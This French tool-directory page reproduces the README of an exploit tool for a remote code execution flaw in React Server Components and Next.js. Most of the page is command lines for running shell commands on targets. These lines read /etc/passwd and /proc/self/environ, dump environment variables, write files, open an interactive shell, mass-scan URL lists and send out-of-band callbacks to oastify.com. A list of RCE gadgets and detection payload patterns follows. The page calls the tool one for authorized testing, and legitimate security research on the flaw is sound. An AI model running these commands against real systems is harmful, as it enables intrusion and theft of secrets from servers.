Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner — Outil d'exploitation pour CVE-2025-55182 et CVE-2025-66478 dans React Server Components et Next.js, avec gadgets RCE, lecture/écriture de fichiers, rappels hors bande et shell interactif pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
Scanners de VulnérabilitésAnalyse Dynamique (Sandboxing)ExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
Red Teaming
Développement de Charges Utiles
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

Outil d'exploitation pour CVE-2025-55182 et CVE-2025-66478 dans React Server Components et Next.js, avec gadgets RCE, lecture/écriture de fichiers, rappels hors bande et shell interactif pour les tests de sécurité autorisés.

Voir le dépôt
2112il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - Exploit RCE des Composants Serveur React v2.0

Un outil complet de recherche en sécurité pour tester les vulnérabilités CVE-2025-55182 et CVE-2025-66478 dans les Composants Serveur React (RSC) et les Actions Serveur Next.js.

Aperçu de la vulnérabilité

PropriétéValeur
Identifiants CVECVE-2025-55182, CVE-2025-66478
Score CVSS10.0 (CRITIQUE)
Versions concernéesReact < 19.2.0, Next.js < 15.0.5
Type de vulnérabilitéExécution de code à distance (RCE)
Vecteur d'attaqueRéseau

Fonctionnalités

  • Scan de vulnérabilités de style PortSwigger avec plusieurs charges de détection
  • Plusieurs gadgets RCE (execSync, spawnSync, vm.runInThisContext, etc.)
  • Test de rappel hors bande (OOB) pour vérification RCE aveugle
  • Capacités de lecture/écriture de fichiers
  • Exécution de code JavaScript
  • Mode shell interactif
  • Scan en masse avec multi-threading
  • Support proxy (compatible Burp Suite)
  • Formats de sortie JSON/Texte

Installation

Prérequis

pip install requests

Version Python

  • Python 3.7 ou supérieur

Démarrage rapide

# Vérification de vulnérabilité de base
python3 exploit-custom.py -u https://target.com --check

# Scan de vulnérabilité complet (recommandé)
python3 exploit-custom.py -u https://target.com --scan

# Avec proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# Test de rappel OOB
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# Exécution de commande
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Shell interactif
python3 exploit-custom.py -u https://target.com --shell

Utilisation

Arguments en ligne de commande

usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

Sélection de cible

ArgumentDescriptionExemple
-u, --urlURL cible unique-u https://target.com
-l, --listFichier contenant des URLs-l targets.txt

Modes de scan

ArgumentDescription
--detectDétecter l'utilisation de Next.js/RSC
--checkVérification rapide de vulnérabilité (test mathématique)
--scanScan de vulnérabilité complet (style PortSwigger)
--test-allTester tous les gadgets et charges de détection

Exploitation

ArgumentDescriptionExemple
--cmdExécuter une commande shell--cmd "id"
--gadgetSpécifier le gadget à utiliser--gadget execSync
--readLire un fichier sur la cible--read /etc/passwd
--writeÉcrire un fichier sur la cible--write /tmp/test.txt "contenu"
--jsExécuter du code JavaScript--js "process.env"
--shellDémarrer un shell interactif--shell
--oobHôte de rappel OOB--oob xyz.oastify.com

Options de connexion

ArgumentDescriptionExemple
-p, --proxyProxy HTTP/HTTPS-p http://127.0.0.1:8080
-c, --cookiesChaîne de cookies-c "session=abc123"
-H, --headerEn-tête supplémentaire (répétable)-H "X-Custom: value"
-t, --threadsNombre de threads pour le scan en masse-t 20
--timeoutDélai d'attente de requête en secondes--timeout 60

Options de sortie

ArgumentDescription
-o, --outputEnregistrer les résultats dans un fichier (.json ou .txt)
-q, --quietSupprimer la bannière

Exemples de scan

Cible unique

# Détecter Next.js et RSC
python3 exploit-custom.py -u https://target.com --detect

# Vérification rapide de vulnérabilité
python3 exploit-custom.py -u https://target.com --check

# Scan complet avec toutes les charges de détection
python3 exploit-custom.py -u https://target.com --scan

# Tester tous les gadgets avec vérification OOB
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

Scan en masse

# Scanner plusieurs cibles
python3 exploit-custom.py -l targets.txt --scan -o results.json

# Avec un nombre de threads augmenté
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# Avec rappels OOB
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

Exemples d'exploitation

Exécution de commande

# Utilisation du gadget par défaut (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Utilisation d'un gadget spécifique
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

Opérations sur les fichiers

# Lire un fichier
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# Écrire un fichier
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

Exécution JavaScript

# Obtenir les variables d'environnement
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# Obtenir le nom d'hôte
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# Lister un répertoire
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

Shell interactif

python3 exploit-custom.py -u https://target.com --shell

Commandes shell :

CommandeDescription
<commande>Exécuter une commande shell
!read <fichier>Lire un fichier
!write <fichier> <contenu>Écrire un fichier
!js <code>Exécuter du JavaScript
!gadget <nom>Changer de gadget
exitQuitter le shell

Gadgets disponibles

Gadgets RCE

NomID du moduleDescription
execSyncchild_process#execSyncExécution directe de commande shell
execFileSyncchild_process#execFileSyncExécuter un fichier binaire
spawnSyncchild_process#spawnSyncLancer un processus avec arguments
vm_runInThisContextvm#runInThisContextExécuter du JS dans le contexte actuel
vm_runInNewContextvm#runInNewContextExécuter du JS avec échappement de bac à sable
vm_runInThisContext_globalvm#runInThisContextExécuter via global.process

Gadgets fichiers

NomID du moduleDescription
fs_readFileSyncfs#readFileSyncLire des fichiers arbitraires
fs_writeFileSyncfs#writeFileSyncÉcrire des fichiers arbitraires

Gadgets OOB

NomDescription
vm_fetchRequête HTTP via l'API fetch (Node 18+)
vm_httpRequête HTTP via le module http

Charges de détection (CVE-2025-66478)

Le mode --scan utilise ces charges de détection de style PortSwigger :

ChargeDescription
property_referenceRéférence de propriété délimitée par deux-points ["$1:a:a"]
property_reference_v2Référence alternative ["$1:b:b"]
property_reference_constructorAccès au constructeur via référence de propriété
property_reference_protoAccès à la chaîne prototype via référence de propriété
action_ref_vmACTION_REF avec vm#runInThisContext
action_ref_execSyncACTION_REF avec child_process#execSync

Méthodes de rappel OOB

Télécharger l’outil